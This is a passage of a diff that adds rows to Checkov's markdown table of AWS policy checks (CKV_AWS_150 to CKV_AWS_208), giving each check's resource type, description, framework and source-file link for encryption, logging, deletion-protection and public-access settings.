+|  514 | CKV_AWS_150              | resource                         | aws_lb                                                                                           | Ensure that Load Balancer has deletion protection enabled                                                                                                                                                | Terraform               | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py)                                                                                       |
+|  515 | CKV_AWS_152              | resource                         | aws_alb                                                                                          | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled                                                                                                                        | Terraform               | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py)                                                                                                         |
+|  516 | CKV_AWS_152              | resource                         | aws_lb                                                                                           | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled                                                                                                                        | Terraform               | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py)                                                                                                         |
+|  517 | CKV_AWS_153              | resource                         | aws_autoscaling_group                                                                            | Autoscaling groups should supply tags to launch configurations                                                                                                                                           | Terraform               | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py)                                                                                           |
+|  518 | CKV_AWS_154              | resource                         | AWS::Redshift::Cluster                                                                           | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Cloudformation          | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                                          |
+|  519 | CKV_AWS_154              | resource                         | aws_redshift_cluster                                                                             | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Terraform               | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                                               |
+|  520 | CKV_AWS_155              | resource                         | AWS::WorkSpaces::Workspace                                                                       | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Cloudformation          | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                                  |
+|  521 | CKV_AWS_155              | resource                         | aws_workspaces_workspace                                                                         | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Terraform               | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                                       |
+|  522 | CKV_AWS_156              | resource                         | AWS::WorkSpaces::Workspace                                                                       | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Cloudformation          | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                                  |
+|  523 | CKV_AWS_156              | resource                         | aws_workspaces_workspace                                                                         | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Terraform               | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                                       |
+|  524 | CKV_AWS_157              | resource                         | AWS::RDS::DBInstance                                                                             | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Cloudformation          | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py)                                                                                        |
+|  525 | CKV_AWS_157              | resource                         | aws_db_instance                                                                                  | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Terraform               | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py)                                                                                             |
+|  526 | CKV_AWS_158              | resource                         | AWS::Logs::LogGroup                                                                              | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Cloudformation          | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                                          |
+|  527 | CKV_AWS_158              | resource                         | aws_cloudwatch_log_group                                                                         | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Terraform               | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                                               |
+|  528 | CKV_AWS_159              | resource                         | aws_athena_workgroup                                                                             | Ensure that Athena Workgroup is encrypted                                                                                                                                                                | Terraform               | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py)                                                                             |
+|  529 | CKV_AWS_160              | resource                         | AWS::Timestream::Database                                                                        | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Cloudformation          | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                                          |
+|  530 | CKV_AWS_160              | resource                         | aws_timestreamwrite_database                                                                     | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Terraform               | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                                               |
+|  531 | CKV_AWS_161              | resource                         | AWS::RDS::DBInstance                                                                             | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Cloudformation          | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py)                                                                                  |
+|  532 | CKV_AWS_161              | resource                         | aws_db_instance                                                                                  | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Terraform               | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py)                                                                                       |
+|  533 | CKV_AWS_162              | resource                         | AWS::RDS::DBCluster                                                                              | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Cloudformation          | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                                    |
+|  534 | CKV_AWS_162              | resource                         | aws_rds_cluster                                                                                  | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Terraform               | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                                         |
+|  535 | CKV_AWS_163              | resource                         | AWS::ECR::Repository                                                                             | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Cloudformation          | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py)                                                                                          |
+|  536 | CKV_AWS_163              | resource                         | aws_ecr_repository                                                                               | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Terraform               | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py)                                                                                               |
+|  537 | CKV_AWS_164              | resource                         | AWS::Transfer::Server                                                                            | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Cloudformation          | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py)                                                                              |
+|  538 | CKV_AWS_164              | resource                         | aws_transfer_server                                                                              | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Terraform               | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py)                                                                                   |
+|  539 | CKV_AWS_165              | resource                         | AWS::DynamoDB::GlobalTable                                                                       | Ensure DynamoDB global table point in time recovery (backup) is enabled                                                                                                                                  | Cloudformation          | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py)                                                                    |
+|  540 | CKV_AWS_165              | resource                         | aws_dynamodb_global_table                                                                        | Ensure DynamoDB point in time recovery (backup) is enabled for global tables                                                                                                                             | Terraform               | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py)                                                                         |
+|  541 | CKV_AWS_166              | resource                         | AWS::Backup::BackupVault                                                                         | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Cloudformation          | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py)                                                                                  |
+|  542 | CKV_AWS_166              | resource                         | aws_backup_vault                                                                                 | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Terraform               | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py)                                                                                       |
+|  543 | CKV_AWS_167              | resource                         | aws_glacier_vault                                                                                | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it                                                                                           | Terraform               | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py)                                                                               |
+|  544 | CKV_AWS_168              | resource                         | aws_sqs_queue                                                                                    | Ensure SQS queue policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform               | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py)                                                                           |
+|  545 | CKV_AWS_168              | resource                         | aws_sqs_queue_policy                                                                             | Ensure SQS queue policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform               | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py)                                                                           |
+|  546 | CKV_AWS_169              | resource                         | aws_sns_topic_policy                                                                             | Ensure SNS topic policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform               | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py)                                                                           |
+|  547 | CKV_AWS_170              | resource                         | AWS::QLDB::Ledger                                                                                | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Cloudformation          | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                                        |
+|  548 | CKV_AWS_170              | resource                         | aws_qldb_ledger                                                                                  | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Terraform               | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                                             |
+|  549 | CKV_AWS_171              | resource                         | aws_emr_security_configuration                                                                   | Ensure EMR Cluster security configuration encryption is using SSE-KMS                                                                                                                                    | Terraform               | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py)                                                                               |
+|  550 | CKV_AWS_172              | resource                         | AWS::QLDB::Ledger                                                                                | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Cloudformation          | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                                  |
+|  551 | CKV_AWS_172              | resource                         | aws_qldb_ledger                                                                                  | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Terraform               | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                                       |
+|  552 | CKV_AWS_173              | resource                         | AWS::Lambda::Function                                                                            | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation          | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                                    |
+|  553 | CKV_AWS_173              | resource                         | AWS::Serverless::Function                                                                        | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation          | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                                    |
+|  554 | CKV_AWS_173              | resource                         | aws_lambda_function                                                                              | Check encryption settings for Lambda environmental variable                                                                                                                                              | Terraform               | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                                         |
+|  555 | CKV_AWS_174              | resource                         | AWS::CloudFront::Distribution                                                                    | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Cloudformation          | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py)                                                                                            |
+|  556 | CKV_AWS_174              | resource                         | aws_cloudfront_distribution                                                                      | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Terraform               | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py)                                                                                                 |
+|  557 | CKV_AWS_175              | resource                         | aws_waf_web_acl                                                                                  | Ensure WAF has associated rules                                                                                                                                                                          | Terraform               | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                                   |
+|  558 | CKV_AWS_175              | resource                         | aws_wafregional_web_acl                                                                          | Ensure WAF has associated rules                                                                                                                                                                          | Terraform               | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                                   |
+|  559 | CKV_AWS_175              | resource                         | aws_wafv2_web_acl                                                                                | Ensure WAF has associated rules                                                                                                                                                                          | Terraform               | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                                   |
+|  560 | CKV_AWS_176              | resource                         | aws_waf_web_acl                                                                                  | Ensure Logging is enabled for WAF Web Access Control Lists                                                                                                                                               | Terraform               | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py)                                                                                                           |
+|  561 | CKV_AWS_176              | resource                         | aws_wafregional_web_acl                                                                          | Ensure Logging is enabled for WAF Web Access Control Lists                                                                                                                                               | Terraform               | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py)                                                                                                           |
+|  562 | CKV_AWS_177              | resource                         | aws_kinesis_video_stream                                                                         | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK)                                                                                                                       | Terraform               | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py)                                                                       |
+|  563 | CKV_AWS_178              | resource                         | aws_fsx_ontap_file_system                                                                        | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK)                                                                                                                       | Terraform               | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py)                                                                           |
+|  564 | CKV_AWS_179              | resource                         | aws_fsx_windows_file_system                                                                      | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK)                                                                                                                     | Terraform               | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py)                                                                       |
+|  565 | CKV_AWS_180              | resource                         | aws_imagebuilder_component                                                                       | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK)                                                                                                                    | Terraform               | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py)                                                     |
+|  566 | CKV_AWS_181              | resource                         | aws_s3_object_copy                                                                               | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                             | Terraform               | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py)                                                                       |
+|  567 | CKV_AWS_182              | resource                         | aws_docdb_cluster                                                                                | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                 | Terraform               | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py)                                                                                     |
+|  568 | CKV_AWS_183              | resource                         | aws_ebs_snapshot_copy                                                                            | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                          | Terraform               | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py)                                                                 |
+|  569 | CKV_AWS_184              | resource                         | aws_efs_file_system                                                                              | Ensure resource is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                   | Terraform               | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py)                                                                     |
+|  570 | CKV_AWS_185              | resource                         | aws_kinesis_stream                                                                               | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK)                                                                                                                             | Terraform               | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py)                                                                     |
+|  571 | CKV_AWS_186              | resource                         | aws_s3_bucket_object                                                                             | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform               | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py)                                                                   |
+|  572 | CKV_AWS_187              | resource                         | AWS::SageMaker::Domain                                                                           | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Cloudformation          | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py)                                                        |
+|  573 | CKV_AWS_187              | resource                         | AWS::SageMaker::NotebookInstance                                                                 | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Cloudformation          | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py)                                                        |
+|  574 | CKV_AWS_187              | resource                         | aws_sagemaker_domain                                                                             | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Terraform               | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py)                                                                 |
+|  575 | CKV_AWS_187              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Terraform               | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py)                                                                 |
+|  576 | CKV_AWS_189              | resource                         | aws_ebs_volume                                                                                   | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                 | Terraform               | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py)                                                                             |
+|  577 | CKV_AWS_190              | resource                         | aws_fsx_lustre_file_system                                                                       | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK)                                                                                                                        | Terraform               | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py)                                                                               |
+|  578 | CKV_AWS_191              | resource                         | aws_elasticache_replication_group                                                                | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK)                                                                                                              | Terraform               | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py)                                         |
+|  579 | CKV_AWS_192              | resource                         | AWS::WAFv2::WebACL                                                                               | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Cloudformation          | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py)                                                                                      |
+|  580 | CKV_AWS_192              | resource                         | aws_wafv2_web_acl                                                                                | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Terraform               | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py)                                                                                           |
+|  581 | CKV_AWS_193              | resource                         | AWS::AppSync::GraphQLApi                                                                         | Ensure AppSync has Logging enabled                                                                                                                                                                       | Cloudformation          | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py)                                                                                              |
+|  582 | CKV_AWS_193              | resource                         | aws_appsync_graphql_api                                                                          | Ensure AppSync has Logging enabled                                                                                                                                                                       | Terraform               | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py)                                                                                                   |
+|  583 | CKV_AWS_194              | resource                         | AWS::AppSync::GraphQLApi                                                                         | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Cloudformation          | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                                |
+|  584 | CKV_AWS_194              | resource                         | aws_appsync_graphql_api                                                                          | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Terraform               | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                                     |
+|  585 | CKV_AWS_195              | resource                         | AWS::Glue::Crawler                                                                               | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation          | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                          |
+|  586 | CKV_AWS_195              | resource                         | AWS::Glue::DevEndpoint                                                                           | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation          | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                          |
+|  587 | CKV_AWS_195              | resource                         | AWS::Glue::Job                                                                                   | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation          | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                          |
+|  588 | CKV_AWS_195              | resource                         | aws_glue_crawler                                                                                 | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform               | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                               |
+|  589 | CKV_AWS_195              | resource                         | aws_glue_dev_endpoint                                                                            | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform               | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                               |
+|  590 | CKV_AWS_195              | resource                         | aws_glue_job                                                                                     | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform               | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                               |
+|  591 | CKV_AWS_196              | resource                         | aws_elasticache_security_group                                                                   | Ensure no aws_elasticache_security_group resources exist                                                                                                                                                 | Terraform               | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py)                                                                         |
+|  592 | CKV_AWS_197              | resource                         | AWS::AmazonMQ::Broker                                                                            | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Cloudformation          | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py)                                                                                  |
+|  593 | CKV_AWS_197              | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Terraform               | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py)                                                                                       |
+|  594 | CKV_AWS_198              | resource                         | aws_db_security_group                                                                            | Ensure no aws_db_security_group resources exist                                                                                                                                                          | Terraform               | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py)                                                                                         |
+|  595 | CKV_AWS_199              | resource                         | aws_imagebuilder_distribution_configuration                                                      | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK)                                                                                                  | Terraform               | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py)                     |
+|  596 | CKV_AWS_200              | resource                         | aws_imagebuilder_image_recipe                                                                    | Ensure that Image Recipe EBS Disk are encrypted with CMK                                                                                                                                                 | Terraform               | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py)                                                         |
+|  597 | CKV_AWS_201              | resource                         | aws_memorydb_cluster                                                                             | Ensure MemoryDB is encrypted at rest using KMS CMKs                                                                                                                                                      | Terraform               | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py)                                                                             |
+|  598 | CKV_AWS_202              | resource                         | aws_memorydb_cluster                                                                             | Ensure MemoryDB data is encrypted in transit                                                                                                                                                             | Terraform               | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py)                                                           |
+|  599 | CKV_AWS_203              | resource                         | aws_fsx_openzfs_file_system                                                                      | Ensure resource is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                   | Terraform               | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py)                                                       |
+|  600 | CKV_AWS_204              | resource                         | aws_ami                                                                                          | Ensure AMIs are encrypted using KMS CMKs                                                                                                                                                                 | Terraform               | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py)                                                                                                     |
+|  601 | CKV_AWS_205              | resource                         | aws_ami_launch_permission                                                                        | Ensure to Limit AMI launch Permissions                                                                                                                                                                   | Terraform               | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py)                                                                                             |
+|  602 | CKV_AWS_206              | resource                         | aws_api_gateway_domain_name                                                                      | Ensure API Gateway Domain uses a modern security Policy                                                                                                                                                  | Terraform               | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py)                                                                                 |
+|  603 | CKV_AWS_207              | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker minor version updates are enabled                                                                                                                                                       | Terraform               | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py)                                                                               |
+|  604 | CKV_AWS_208              | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker version is current                                                                                                                                                                      | Terraform               | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py)                                                                                                 |
